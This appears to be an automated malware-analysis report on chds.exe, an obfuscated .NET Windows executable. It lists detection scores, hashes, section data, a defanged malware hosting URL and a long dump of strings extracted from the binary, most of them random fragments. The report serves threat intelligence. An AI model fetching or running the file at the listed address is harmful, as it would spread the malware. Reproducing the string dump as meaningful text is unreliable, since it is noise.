MalScore
100/100

chds.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 26/66 Related 2234
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 313.00 KB (320512 bytes)
Compile time: 2018-03-21 23:45:10
MD5: fce344ec7f6879f961bca5c7b6a8d5aa
SHA1: f317d9b628835cbea76e39071b7ff8114f7b94ae
SHA256: bb6e552efc214121052b486702d03a09fe1cb4f1c2d2207d7ae0c033b2d4e443
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-03-22 17:42:01
Last submission: 2018-03-22 17:42:01
Filename detected: - chds.exe (1)
URL file hosting
hXXp://31.220.40.22/~harryhua/coco/chds.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-03-22 16:36:15 [26/66] VirusTotal
PE Sections 3 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x4cd64 314880 2290eb9f207ced37375056b5092a7727 e33807c7b208135c1c8859bb5a901c186e24a5ee
.rsrc 0x50000 0x1000 4096 b0dcdc0851991e1c199fafc4ad09858a ddd025ed86b6d69437485140628a46eb52d57be8
.reloc 0x52000 0xc 512 fdb7f98fbd0d8d381ddf29ecb8df17e4 f4f9adf84e76701aa8d34350797b89ed436d7169
PE Resources
Name Offset Size Language Sublanguage Data
RT_VERSION 0x50058 572 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright:
Assembly Version: 0.0.0.0
InternalName: chds.exe
FileVersion: 0.0.0.0
FileDescription:
Translation: 0x0000 0x04b0
OriginalFilename: chds.exe
ProductVersion: 0.0.0.0
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
System.String[]
GetProperty
1WemO0exyVfmLpDHjYGoQ7qz
VsaytiNxzJsFBYS5UkUyVcTc
FGEoP5HDd0UqAYZjc2yiEu1dRA5dLfL
VarFileInfo
FileDescription
chds.exe
kBMhxHzc7UmxyiamHvd3F48aQHPfxSDs6qCw4S
ProductVersion
GetValue
System.Object[]
a8W8EKndjVQyM8VtuM0nzGP4mjHPNVFpj10vEg5
StringFileInfo
1wc3fnlvoTrkBdFBq1sZN
OriginalFilename
parameters
w1kZGLZjYFDbdronijXOxfWjbhelGKvh7D1
index
PikClDZLHhKW85mLQoMm44oT
System.Array
9hzBkiMoGFqbkwxHk4YOkzb8o6
FileVersion
75gk0RbGw5XvHm4UnIPdwMnRokr7omD
0.0.0.0
ToString
CEqdUWtArJJ921J5Zin0H6rukb6Ln09VFHwI
iyG8VmzmNNxr1lk9mScCZ2I
Mzm5dLWQuaduP2FVS6upc7y7as1p4
CxUixnoyRNPY90NdzR1PVqi
In9f1OTkR8oaTd7cWlFKNSdjqoTu
Tx6kqYxBPAhsCoRPc0KyrBV6TPxftN3Q6PrZ
Translation
zuTDyqkZW0BdqBWJfsJySHpRURZ6Pp0r2d
qHPjxwCVd0m6dQNExDHZU8LGb9Na20sLC
Assembly Version
4hWpQlr62wO2ekR07x75GYOiICpPmmZSy2Wm8
System.Object
System.Text.StringBuilder
VS_VERSION_INFO
System.Reflection.MethodInfo
InternalName
CreateInstance
HJCVqmqPRfNtKlj7vbLUpw643xfA4cGJakCoJO
bKMxHe5jkLgWiKg1K9Gja
System.Reflection.PropertInfo
Length
System.Activator
nHfDwkvmPdw5mf3GVqJqfj
GetMethod
Invoke
ddK3cdMoK5qitbyIbSohjm5PrfI
ele2SpPbTTSaPziyVVJIq
w1KXgtsrKEAFaH5sT4Xmoh1AnifGBLq3o8
So8w31iGx7bj26XA5eVc9CrPzKpJg
types
LegalCopyright
mJqi8ygpXgpFsdRlvNGMH
SetValue
obj
name
QnuYXJMgdt8RlIGQWGfPqtYrZYVupVb7uj2`
GetType
C2n3IhlIdzVAHcxexWCcHrfw4YtmKqbw
000004b0
value
E1VJhVc9IyloJ9dngk4LbkJ
WJMMgwmn28XfKPmM7m2Isnnsi2CW
oIVjH99R39iED24aAy6rMY1mtCctTLOE2nOlOmb
System.Type
Append
hZ6ZZ0lkU44RBqhCFY03HdmHiOi4QUij
zvHWC
Rqg#
Z$G4z6
p9D
=6k4
kE\=
j#Y9
c5|1
+P v\
,F^a
< [CV ,
ipZf
t H;|
:DXnx
5RsX
&u<d
Int32
-PiF
x.h
r%MW
?>z-
tlBO
>M`q{NRd
ao:j
"f1n
zPYV
LjE]\>
m ;Y
LFry
H'KTd
v1\.
A}Eywq
[dR~I
/gKuY>
=MHf0
-3]TP
{_h)El
x8aCF
tw6v
a[z+
|G}5
e&~5U
<Uet
")|T
TvG*
XB^b
\d[@{g
8U{a
+XF""
nyp{
o".?UKbMtU
nX ]
})46
[p,}
|)cm<l^E
<mQa8no
(%!&
vq$PP
J9F_
uQUg4qBP
Ku>K
Ea O
DKFp
[?m?
QUiZ
q l7
mV|<
r^tX
WO:t
wl{5e
+qGc
r* 4
rG
*bNHQ
MEuzE
$ g
N9dO
0)zj
DT\Le
cu3T
:7WQ9
J6b>
vK^w8
=Y:,
$*r
Cr'{
Q}X,
O/o?
or$"Uo
:Jcc
!H{!
OUeA
T"x37
xo8`"
t=m}
\~7
:n
tjL:
wg>e;
'\r`/
G+Z Q
`v,l
IThcC7
tGU.
%zeG( >(q=
zxx,j
q 1k
\_j
\UHU
a"Fz
/%l
= p"P_
ce'W
a_ U
]| Z
T/#6
M'l>
B Rs
E%`-0
SE@Hz
:h,J.WR8
9-i,m-
,8vE
52;8
U_
[K,W
%oRM
kB G
G+"_ /
System.Security
Y+Q:
?[;E!>0G
:6S/,
lVbm
l,C#
`k8(4
?euj
c'od
K5vF
iN \
!qHPjxwCVd0m6dQNExDHZU8LGb9Na20sLC
B(-A
>GZ!
u.Pi
\b|x
LYVBV~
eRf]
,\ L
[D=o
iX$2
y2-F
uKCq
\;_!
Wxn<
Zj )
Tf.'
,}z
}~@(
f9-YL
_^ 6
oniE
(h^xUK
0-2N
)y}3
%Ubr@
C]/t
pZY[
4{Ku
trX>
"\H{
KH(0
'qrJo)
5ie
$${W*
1+C(G
,*;:'
x@64
94=+
{9([L]
^chd\
`X Vp
)"vR
fVN@
11$9
N L
D&!jE
~6]Fmq#v;
'u8l-!f
y_HP
?W'*LEq
k/tu
YyYy
'/q
bgaV
czx 2
C2 43
)wh F?
@Y=B[
h5de~
S}vPt.
&Rk)X
h}'`C 8
3ML$
ibv$
&38ocb
"XPq<
G42n
! Q'
%h V
#y q
$N8
ulC5
I{PJ
&&+`
GXd/
pSf$
p0Cln
m;sW
X'T(
fC2o3j
]Zr`3
#$Q
[9J|
YU#
+z/B@n
x{eg
"7s`z
}]]p7
Gp["
D4P]'
*-=yX
1 v!)
}QRm
;E60
HN8',-
b/agL
Bb32[
v2.0.50727
Oa!. 3y
Dq'LV_ 7
V{vQ2
sJi,(
pop|
V]-R(
'a8W8EKndjVQyM8VtuM0nzGP4mjHPNVFpj10vEg5
,b\'
Vi7L
P)=@yv
A;gG
>T:$
^JM&
60wt
F-#*
q&C(
6W) v
/^1(
GB<|>
& ~c
fp:!T"
N|O~
.FLv+
ijyrsf
=\jvvw,
y"K<
$H|=
QM -
Q{9j
3kyyt
~p=<
k!zY
$CEqdUWtArJJ921J5Zin0H6rukb6Ln09VFHwI
=\ Fq
h} KXg
4<9LU
O97J
Z/s,2i
tXae=
\&-1
Pn@{
<Y:qA
;pNQ
WAc@Sk
- zTX>E
Fs,]
UnverifiableCodeAttribute
WNQ#
Q<+n
"/ik
HS'm
-Pc#]e/R
!MW.
|+O
HE[N
i[$ e
U#&.(
4tB
O8\d
:X#+
9FD!C*[
$xr!
v.;P,
v~AC
/3|5
h9 I
pc^h
'% cE
T2)BF
j^.!
?. LL
qi4W
#Blob
mSSCN
B|x6|
Q01
h60/=
=kr~
3)S@0
7-0L
!( Uv
I3#+
s1@T
D;J ;
ZN \N
Nmeo
CC^y
kSVd
Ze/
b6M0S
&|Ii
V7Lz
0+ylQ
Gfc c
* %'
A/SO
T;8
@fQ<b
B3TK(
@\6Swm-
x5G
0lD\z
Type
*]oI
J,B4=
RuntimeTypeHandle
q#QJ:
rWRR
ol@
9&Hcf
=V/(
J\N5)
Q?NH
O&-}
6wdd
i?ez4
Ljuj
=Qm-
KgjqK3
Hz0;
/2PK_
oTxNk
,D&
;^8_@D
N2nq
@+fH;
bZ([
`_Mv
,mj9
VA
_CEI
EY\O
&f2
Q /&
]*Jj
A xy
RLe03OfCjp9xjV9Sw2QBmq.resources
6T/C
Ww:a
vDy
tP[E
MQ=5
aDI!W
Z6~h
,o5g
2@bP
;!z>B
{4o/
0>:
\ lZ
P#>,
3~s(
#E60%V
8rSR
D-B#
Ve u
C{9o*
txQ2
z?<b
LateGet
frlOt)
~t"8.
qE :
I+u/
X^|
B&BW
E,C%
3B/ma
}eP-
6)H}Z
!zy<
`{l\
RIs!U
Ez
1*9
j!Z$
;`,\q
?RrWC
5X2$jt
%=G,
NB
xnQ2
Ft})
chds
wlW$
U.Ki
b8K$!
/[ W
P`:P
y)#g
/%3(
~F5$z$
BJ4e
KQ0w
6iX{
>}%>Y
q+29w
r6=K
NFVkA`
t+!8e/
1@3[
,UFG
c[~]
=S{b
t&wj
=Hfr
FvNe!V
C_#<t
a,a)A
6qjL
10tg
b8fL
: Iv(}TR|
Sn;
k%d5:
>hB`j&
db23
~Cc`
T BnyqK
M]4
6vl mGS
CbaJ3
fyj.
Exception
yo&
v5Y
u \7
g?*'S
BtRT#
4#`Qs>
|VGQ[j|
O/Hs
.text
+IDY=
4* \
O-jJ
tnQ4
YXA
Py"2N.
dfMU
{=-C
A);L
QFrVD
P6"e/
CbF
gcON[[
yK*/
zYVf
,^TH
9{Hi-}!
\).
k_= a|
t[>$
jJ|p}
e+G,
>xE-c
GP<gC:?
cBT t
' Tn-
vX<|
b ~1r
/sAn
,Z9}%
v^
]N[pe
L'C
[|+#
/0I@N
'#-,@
IX%i
?;Ej
j-\G
Q0J*Roh
msXO|
mHO
6KGC
:F"=
* LC
2]#60
}k,Q
]mA_
<39A
;'4%
< fr;u
R%:_
%lsb
D1ELB
arpF
Q}:x
w|]yz
_vUR
f##g
A9g+DT
+_`<
qp
&G6L{
O:0$Oa
`>H,
\}gO
1h,s
A5~cT7
fSW=
XMw@[
'U(q
"v}'~T
-3]n
+!hp
Tu Y
=-cUAL
3{
C5 ]
b}c&
Nwyx
nO,Z
d!c0
%%y|
W'E,
.AO
h'|#
yF(k1
at J
]EB
LpsHh
~M-FD @
'3)U%
*|yv
]t
`QC&
qI2e)lk;
(D^c
bA a
[J |9dt
}}hz
8G#~31
(&zFh
<ToM5
]HAJ}
="B
le{0
`.rsrc
M;'eL
1Y|R
`KuGg
cq8!
<|7s
j:b3
O5 t
?4N:
43I|V
(65Q
j6 mf
N5I#Z
QU7xw
|glk
uqJz
' hbg_
]U>6
i\]"
XUIA
yNuKj
'$LU\
nFjL
5-N
.ctor
StU|
zk[
J9g,
j$x("
w1?R
Q)z$
M\9V
x"nV
T<Ne
)tc
<*C_
YjRE
+l
7?A}
tcn%
KCF~
i'.q
*]@
Fx.Si
t?a"O
% ek
p d}k
_JyW
BiTc
(pf-
z)sA
0S=`
UASF
`Q,CE
4f_,
J/79
H^ &n
S6Q3
q] !
2Q{nn
$E9
v)Z512<
. i<
,R:.
Lb`
]4$1
8TOv
& Pb
y$E%
v> P4!?z
`n @/`K
e.6#m
r3=w
G`Td(
? h(%zF
ghb?
Wr,8
Q*one
ujaR
^]_eY
*YYs
k!JI
M-\w
?*S# '| }6
4nG21
7>8G
M5*j
vT$-
*o{TFlTj
!MH?
ksl y;K
ey):
LyPAm5
+%t
3TibV
*7TuE1r^
q3RU
wbzC
/gUr
7z`"2
}?0-
=\qX
rv&19
#Tv=h
+,|ctbO
-\W
#QnuYXJMgdt8RlIGQWGfPqtYrZYVupVb7uj2
N =}
MLWd
S`R
#:;'
FCPu
dj|j
^^?nJ
22[>3
P@[+u
?jzF
y { Z
@@H H
dF| na
C^mDK
WTS[
)``H^
dLN{+
hr"X:PvC)
3n'B
( CY
eT s
ngVi
2<RLW
0: ^
/O`E/
RXyI
%!'p
}t&\
GfSX
]hk =
4m`
oi75
vHGN
C,dXK%?SoZ
g yV
_ <_` _
08w9Q
A?FN
) '|:`)T
-l2 B
CJT~
^^Q=
H0[70
V4=(
v"he iO
8A!Fn
chY}
2s,5
5Mr_E
c+[/
J qzM5
O%Se
D)[=e
Y^>C
6f?X
z z;
mscoree.dll
15C[
>dy=3
?"m_
C r8
y5g>
(hci
v|[
_Dl
[+abIFgz
Wv
[RqFk
&)Z?
kpPV
h|dlf
z$`$L%
e}0u
{GCC
f[1|
^Ur?
{u.E
{hX15
6D\5L|
k!&=
WrapNonExceptionThrows
3223
nf1*
'q{Hm o
P fLHN
Y;d%j1
SwCH
aY\
BhV8z
R\"m
L!~
)tT,
hY%P
e;G|c
YW8dI
~\ 9
'@FB
B4,{
i3/2
6hiu
/&}
RgKI<C
( NR
={vh
dDnh
T15.
8LOFU
xtxqD
nu.>Vm
i oe
GH 6
kN1w
Y4#v
rHx2T
%N][f_f
mt=[
ybH~$
p7#m?
B4,R
%(S/
!6~}
4I{5
R?kh
\`oB)
*>`Sc
_O$r\_8\
DialogResult
=Rzi@
C4^w
[lVn
PueaR
M-e~
"cjg
Se4!H
Tr#F+
H'P03
G?_s
[Hiw
{0&
j"Mk
!2hN
iK3p
=mZb
$Pc!
)2 {T-
hV%2
.bCQ
b\E-
SnKG
f4GP
wNeY?
H}H
vwe}.
'a
4k u
,qNA
pPY8
M Kb
&?_nn
Lkz{
iO2-M
#u>+
\XK+H
:: [
CW_
:+-%
A@0%
K:86
W5&R
A`"g
H^rKi
6t-Y
9MFKl%
u:"p
~#|u
Vojb}
(J0n
+ J+
xO_o-
fnt8
.^`M
GIy#
0#<_
VJ^2
u)K\A
AE [B<
/_C Kl
I:xf
tG`#
tU}sp
EQL1
+]-C!4
w0|UR.
\0X$
.>^(:
CW-!
'R>d
=BfA1
DN-|be1kO
(O=
G#;G
e85'
~ SD
P73rK
]WYyK/
l(}9
QG.Ne
en'r
UAFH-
><T )
.X&Nog
#Strings
DQ +
;a[H|
P^GG
U-KX
1MJm?
NBn(
?};Ly<4)H@>
F`MP4
3;h_)
o~B'#
4s;S
~[K!x
yd9O
^7
akQe
nkud/j
qpIZd%
gM2u54
<x[Yj
^lRO8m
[ O?Rx
+XAS
!1iS
|Uy'
95s'("
UcxC
OXZR
#a
RCHN=
GSF"
E0D@
)QcwM]
)+vK
}zWq<
o K5,eA
[1-C
s:~e
\\sC
--K3
kL_3~
0}
90e5
2v' `x@koM
_khk
hxjH
sN6.
(~+[
OTz!hB
0M0H
_}1@
)h f
)#fN
fG6ZrVi
#1ASiBw
_]bnk
JPm*>
Wqat
# T[
.>_F
MJVy
System
s \ x8e
C&z5
tl'
14Tq
_v*]
S= erz0
xol+J
7~VM
PgR{
iMn{G
Ml3yM
z#`v
`;E>
*=!d8
*^x Z
e^+\
"/}G
!<lH!
05\j
8!6<
q#=?
wC%Typ
nWtn
SP_)
Ct#~
~Z ,
,u6!
MH|:L(
#E%k
6. PTI
>=S
*6u'=
TF+X
.>;%
P^ {
FYjY4
3N&7
^v{
CR{l
v/K]
A53i
tF<
Yx&
`YO
lQ!{@
",XH/
?V>
P:V:
wl|!d L1+
6K7H
PJ5
s1 7
U<&N
cF-OY 6x
oRi"
-V^w
]]ywk}>)w
Rd!7
b8C"
x3v.)
v(Z7
(T{{
ZJF^
k0 +
.;jT
)L J
CwWir6iz .z
#_W
c 0
gOHc
(EI-X
!*K*nB
@#W
JB^G
biA! &cg^5
g)
C6c}W
L$5s
;03VE()
"XQn
v!5)Q
Y%S}
U; Q
% G|Of
2Y?q
Xs7(
RvWj
Lfq&
5 B`Z
]y?R
SJ)ja
HgQ
$iz u
Q ~-*;=
ziXs
DU{
v`"{
\z P
f[9
dr<u
>|aA
E!A:
f@I9
\Y0l%
H6e3N
;%
3YZ#
Ai#u
E0P[
9j{Y:
YL^:
i.5+
La?}p
w>^p !
qI[w=7Q
W>buW
xJQw"/ d
97lQ
.'U
$6"Nx
MN8%yp
Q4~!,
8H;#
Q3g6
l($r,
0 `4}
%FN<D*K
X)Ao
lI?B
e$5k
x Sl
DTpz
8xG6
hOqm
ni_7^
MW:F7
9^FS
[3K:,
YYRM
goH(/%
es0q
GGmv
I#IDT
$) m
VT=N4
#fxP
5+y;,Ec
6xioc
M`dba
`IrK
g;j~
.Fwn{
Y @L
-Lq
C0C[,
Vi~y
dFYgs
x64
$6ob
GgF2
Otw7
!7Jn
&X][!<
I,Cf?A
Hu%-
kbsZ
X8
3~Py
Riv0E
.AQC
Dp,x
Qnd@
kc`U>:i
M4^K]
6~+G0
WSl+
QHi$
G\@bu
egtl
Vz[N.
mK5;/S
Omr
19$T
po<- V2
>xwo
}|g"O!
m88L_ ]
.[QJ~
wW 3v_
FU*+
%zT_\
?&pc
vA!Y
S9 d
;A)#
7egL#
\MtXz
Yc]U:
.>N&
y+q`I
|chU
gF B
ht.>%
:ESZ]
p|
Cewx
FNB4
'>qO
a3~J
uMO C
KFB
2 "Hh
h R"
AX;F
[;Qx
l ~HqRI+
0p=-
12=j
+_@V8
L7Pzd_O
BM~{hs
w#rL\
UC"c
~mQ
aBeQ
=Gww
pxr&2r7
)mUT
~UC
yyAv
,vu5
B5:6
Uwd5
_BT?
,:=w
Uebi
pV>*
9rTu
*;m
k0v{I
ParamArrayAttribute
%7ht
Xo"w
lFqv
)F/:j
aVR1 TP
@RW[
p 3M
|*)_v K
|!u#g7
" 7-
5 W[1
Ao[9e
`m_G>(
5ld$#Fzb
m@-c
x hg
q`g5)X
o{h
Y KCJ
Poq$
&*9w2
x`;K:u{
>$xM
M&bP")k
IhL
HUg~U&v
Vp\WPT
U]1;J
;FRfXo
D%a3
\./=
)~`6
9>?z
d0x3a
h^M;
?E#f
,6=@
3okoXw0
"'zn
l/<z
p_R-j
Sd*<
58C4
j9A{
=<n?'
bAXU
_"@(
*wyi`{
XU0n
nt P}
*&~`%
Hb&Ai
O EJ
N$^yA
<) s
V+#5/
ZT! 2
X6R
laf,
x2k]
\LZ;
<ewU5>3
=%>f
rtqAr
@=,w
/THOzzK
[*&H8
~>JT
->b[
Py,d
B'Ba
Pp+d
*P"5
0L[XV
L &w
7QN#
pN>g
C7)(g
^E(`j
(A e{
uF(;
CgBV6
)zM2"#
Qx'J
&,VoVh;UK
G\'K
]2g`
;/QO
#}wB
'Sa1q
A}wrFw<
f x
bs#$
!5X^f- 2!
!F O
bF)#
\cr<
G,pz
yp0'I
CtlW
'rv~+
'GWC
?]I9
bw)B
1 'z
yP7;
nR.n
9G[J
L8g3
,$I(
XBrgt
l#vV
vsq)U
Rc :=G
3,s`
A{ Fi
&HJCVqmqPRfNtKlj7vbLUpw643xfA4cGJakCoJO
&i4T*m\
:zAC
/$?{
-V&3[jcR`
))WS
p*>+
:YJ4
tQ#-36
LSLu*
QHV7
4\[R
#_Tm
yQc35
@6uL
urDB
WH?]
C\2Ym
.= W
5g#0
Mv*W
w 7*
hUw g
bx^r
(!yL
k?W\
.=/?
mmqO
@x<N@"@
np{*
}4;9
m'%Nk
@c'`5
48'
U.L2Y
IE
"w&!H
p0!2
ZKvY
#J&4
f3UG3
CEzG
Kl3E
G@uxt
z~T{xv
fa#L
;*okZ
B O:>
ijLJ[+f|
D;z
BlUK
>vv1
P-;T
N)I79
>kE~
?!Wsr
xf\
p:A$
,H+7
=O'n
C@h X
r2_6mC
kp^R
$&tkP
v=GLBa
X^~\
,-X@
oMJ5
eqU_
&]H. <0c
*Cms
; Yu
=V<S
/{c8
lnE5
CU{ a$
0- k8l
JPV6
eYX~
yg#n
BEoT
k ]B
uyo>,
$ .3F
T>C$Q
u//;
}7 U2
[$:Q
raeZ
fIY\
/LRF f
ssXP
}ZZ4
NE`*
:!be`
L$`L
z~Pw
rz][D$
PAk[
3ITS
:g?#W
<D<@
F JG
.r:3'x
>h(1gX
x{k>
w Gi"cS.
@L9>
,;N
C7 7
e&?-
Xov^
241`
!ZHz
gl?7
"4GJ
yC+/&
^CR-
~H5v
!TLZ
84%0
}wB*
Tk )8-
wS5F
% KB
eTc2&
V=Y
z.f#h
7 5!
>?ZL
5nZR
obN7
LateBinding
, {R
Y$]4
r=0K3v
S,xF?
SkipVerification
BEIe
DdYtj
<k)
|xWN
SAS#
c}N?GuS
ohFe
m !YklKF;Jd
rl
$WU6
~1^X
#Lq
:`+a
FoT<
,HW5
/Mhc8
mtb[
!or6
nSM'
y($!J\
1m&m
> Qw
v'c)u
w * n
~KR on
MW?
7KD 8
c#ewpTgp+xv
yjCN
NTbD
QgY;
']rK
^-lO*
cy*^
,iH<
5Jb`H
`LT.
O< v
a9X:{"
a2*KZ
>#Az
pEb7
inn
(u $
W^YI
8[=D
P"y{|G-h
#4+-
9~ys{
'b_y
mMX"
vRnK
2Gdw
[.:f
:|^z;
'c]-
% +I
b(TLZ{utE
hUY0F
1Su_
1 r/
iE0"y
$gCl%
7~d+H
@+\q
BP9Ug
e *#
C0rA
q2Pr0^~z
1_b'
hP:&
rr/|G
&f<Z
G +}
}t)&
-U nc
L%yCFc
<=L}
X@8N
!i/z
a q\
B5DZi:X
8VFA
C%;zo0K
E|H(
6IFf
3 uwV
Ck9e
SCIO
Dy|^J^
? 3elL
Bmgk
<G P
+#+g
cm]a
hyg*
@.reloc
T |@
i0gG
jvq
HYs8dQ
:V<Q
n|8]
X:cm
|@:o
3"jO
TF)O
2b Q
<n ,
wWaAM
?Z6 {u
%Y*{
Uo5
R920n
1JXlL1
,AGl
Qgk3
{fL(*
0'q+
&ym3d
(tq%z!
OI,8
27X{r=
om] B
La-a
k&JZ4
-Uip!
'eu
!";$
36ZM
-{t&
%zb+>
i|
7;0EGM e(
[#@+*
du<t
o[i\
pC~
` t<
8BJfq
DNeX
vPWa}
nx"]c
~) MY
:?(P
BZFOK
w:Q%
$({s.
~II4
?#zH
2-}O
k-x$
End9
>"K|I
1Rb]F
@)t1x
lCpQ
Xrm3
r+C'
-9Ym
=cDKJu!
GetType
9)W~
br3F
*yVJ
< VN
lR};
`" x!a
F,v1~T
xFxp
58xu
)i!V
;_WI
8- \ x/
h}<>
bAtYk
Z3-(
/I $BC
Itin
(]&y
wY[V3
Em&D
m_v{r
>'~R
^lDX
c_fg
:?h9
E|1/
o0\]>
N;?g:
29II~
VV*<
#/@m
^'Q<S
c)bZY
=FhK
oue\
0h9w
.'Sy
4Vc]9
N(E[onk
o2628
pA'>
`@53&
@Fq!
\Exk
D9S0
,=M%
p?5x
c%Dt q
PKjN
U ~ B
B;O
4aa_Cj
]f&y
k+9rj`
LQ x p
P~ '
hwk1
"`6
W5@H
;cv.
m1^6d
l'yX
IE.v
1!'P|
[ ;=}
E1VJhVc9IyloJ9dngk4LbkJ
t\B@C@
Fe&Y
Y{ l
!W&<
_V> 5
J)xW
~diX
Y"Jdg
e6UV
P3}R
S@%%
| ,hp
GVo8
F*.)jTV=;
RuntimeCompatibilityAttribute
zT5
y+MW@
% R,
u m-
hO0`
zj*k
:h:"
@lV6a
G}3
=7W+T
OeV
/boBs3
^;uE:
00} _r
1wc3fnlvoTrkBdFBq1sZN
_gs|
YWGM
?Z2`
g)/G
bDV
J2_
Microsoft.VisualBasic.CompilerServices
E+sFU2
\h>`
]6O;
(>;MI;
wu`%G
+3=;
+Cl=ft
*5e!m7b!
T7:V
&bw(q
NvPM
":NM
MoW]]
Nu [7
^npJ
b]1f
!dE$
A92%.
I#@,l
\&!7
oHbT
]`
27yP
nec;
|[l*q%
`]Q
iQ+_
)9 8=
Wf>g
i!O+
P:vu<
T#Bf_
QK9
M="L
MxFe
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
mt>D
-}')
7JlQ
5s(W(
x?lE
N`H{
t#hE
Z a
) =ar
"%/p
q7Fp
bWV7&
,~&@@
G4n-
M)jkrP
&W^c
/E'o
b5!u*
BzVg
(-O._
<l eS>
iCU
!nIac
<}k|
7WmTC
#w1kZGLZjYFDbdronijXOxfWjbhelGKvh7D1
/*fV
tn7
>+4.[
TL5X
; d
QPnd
MessageBox
T"QZS
JjQ-&^yYh
6-dc
U aEAM0
+/5}{
EV$|
gJ1
r,OLJ
N@{
V>E6
X6(nE
CHI8|
B+sz
b_Em
7,&~
?u*@B\
1Ja4y
UjbL[
(i'%
PF>0
'wC-
^y*e
qFFF
a[+!
*
i>
%c!vhzm
tm8q
:n{,+
{M#8~<I
no(.
^%~P"=
venu
8f`,
$UN
/q ~
}>f$N*
P:0E
x#}t
>Wo2B
@):1
Lh9egt9<
<$`,
/[5oa
x9/eF G
Q_e< b
h< 1_1
j&>b
Y2"D
B'@1
3<B^
p#"k
?On\
}@xq
RCI>U
c |r A
d:d^
Lm k
G o<
,l{!
#DA
iFK2'
f]|&
;>$j
kHq
r;kw
Xsdg6
9 $z
8M
Ta#j ~
)wUh
Ul=I
3DQ`Q
9NrXCH
?Aw}
\|9+{
5 \.
Ro^#C,v
?<%s
<mhe/
C2n3IhlIdzVAHcxexWCcHrfw4YtmKqbw
o!Ys9
Q6IG
\%QP
0&nJ\
xo>F4Uk
eX^L
crL
luX?
#v|F
aH`0"9
wFT^^
a"HD
(${z
)\6i
k1^[
8/gu
;mmItZ
[Dg+
6++9
D6PP
GK2A
? %V
z{}p
[ >b
Vc4R
rF J
u<t/
XgeH?
| 5
R36o
dY;k
>BkI
Ec{ P
q'w
_|.i
Pi\L
2b6.:
YIidF`
5 C21RZ
CPH^
_a%c
jC4| sv
hVuc
74^F8"
K==e
~*#{b
^*>nqA]a^
g/$R'
Tj iS>_
y{c9j
tEIs
+{V_
MF]Q0
>-e M
\ @'
xp5yW
@sr|
L CU
C-]j
Tv D}
#_Zi
x8$,3
3^]=
k >jb:
UO9KkO7
}.E#
p0p)
WI/@
)YFq
,q|;
(%*n
</jT
M5$V
Nv S3
H+7f
m9E'
VzLln
cK{zxV
(3(0
0r g
BH+5
x_S#)L
HJ/d
l1wD
i|d.
)#O+
K8Z2E
V i6
n0puwV
h+z&
vWr
HCs#
2[='
=3*2
@`(W
7N(T
Tw<\
0B%/
K@:a
rDI/
IC1x
/#}y
M"
}RPb
blG}b
r5 HFJN s
*=w 4
} JXe
a.D'K
.Xw,/
QxbY]
d oI
~ jm-
}D, la"
!5\q
M?/Zx
$B4
>AZ1
V3[$
1^%y
8Pt F+
lYPQ
h[gvS
System.Windows.Forms
PQ[*
KMDM
H,Zr?
8&Zb\
XC@P(D
"(lD
UjA+
%-40
cbc
AR^Y
A61A
X0,\
So8w31iGx7bj26XA5eVc9CrPzKpJg
&(.:
P{^\6
2rG*'
uB-TeC
17X>
Fy SKcv
M:qE{t
t%]
U3~e
v,yv
h2~<
'<1I
k0Z+
v,t`
)(6_
x!/q
w!Vr
yP,
#\$
J6 jxM
P<Fc
w=sp
"MM'
k 1R|
smb
CFE7
DL= Ms6\
[0Ot8
0Pfd
! 13
CtXg
R[|c
96f4L
%S(zB6y m
j_*1
DBS_
64SU
2a&n
Nhzc
Pa~D
Yn*~~
j!'Q-*
RETJAWj4r
b> ^p
Gf51
iyG8VmzmNNxr1lk9mScCZ2I
QEVAa
P.#fvC
0s,;I$!
P/`/5
?ym->nd@
XUFs8/[
G,&c
/n BR.
'@>oY2
cwZB
Mx|-.,y
6;V&
K( c,
j<gE
HZ:|
_ zm
\_sP||
\Vrr)>
D$`X
841>
"('t
ugb>
f#sZ
QYt$N
FcS<a
-;7i
aK`)
#gID
aK!h
deRrG8r;?
f`]r3
%0(tn"AkE1`
*i XVw
t Mn
9fccUxlH
"a7CA
Q![u
vwnEP
U'Gko
4`3NkQ
8 !(
ki$+
k{C?
W+ve
p[6\nEx
]/I$
CRf
vlT32
pSn
+ky|"_u
Va/Y#\[
8+!aY
g)4|
FN H
Iv#}k
NCAu
n !E
Ei?bi
sPk -
dE@]
FE6t
88x Y
"*X;
rLad
m=O:
VZ5C
ZrF#k
J<G'{
%x+z
PMwZ
~f<5
;~i0
(3C(
B4)) J.j
Cm!\
59Tv
}/3U
8>+<
2dk5
l+O
3 + ?
S5;I
Rb)*
3,)u
yh]f80
cPV%
?,;9z
u>>M
e8Uk
RUWV
('l6
&-Sn+
5?_au
0g` q
l\X\
iILc
+:d<&
*$-K e
J|o5^V
?I,)
1Zib
v\=9
R[!PMn
HT&u
O @]e(
% I^
gM N
"k[N
x{_c
he m]
=Hn|
d! n
FX :
EmNw-
0v5D
&(}ZC_
U;GgFV
P&;:?
6Rp=TD
L~4f
7cqkECT
mCSE|
_.gu
-TRW
('X
%Fu8
!y_
o9GMI
.s\8
:B 6
UEpC
zh^~
sOxK
>qsP
2S>@g
s)$=
=Xf"K
)Vm%<
}R1;
6m^1
[xQin
u17B
vl_-
aCp@,;
Lh,&
0[m\
zLWj
>BTe]
jeM30
%'\)(
\i}~
rbV3D
!?*9
7~b=!
HSYa
|// F
L/Gg
#=\w
@[S1#
jmVR
tT]E3~
2[%[
>y*w
p/%q2
DNcKe`
T$R.
Fj!?
ojg J
x`[i
C v(0
W6w&
:t- 8<
QhC_
System.Runtime.CompilerServices
feyc
Microsoft.VisualBasic
|-:n
3,q
a0i!
!Qpw
A`uR
Object
9[XX
S -p
4?P]^:
76&5
X(_s
#tv,
'<MH
9Cm=`
3(}FS
Nq]:
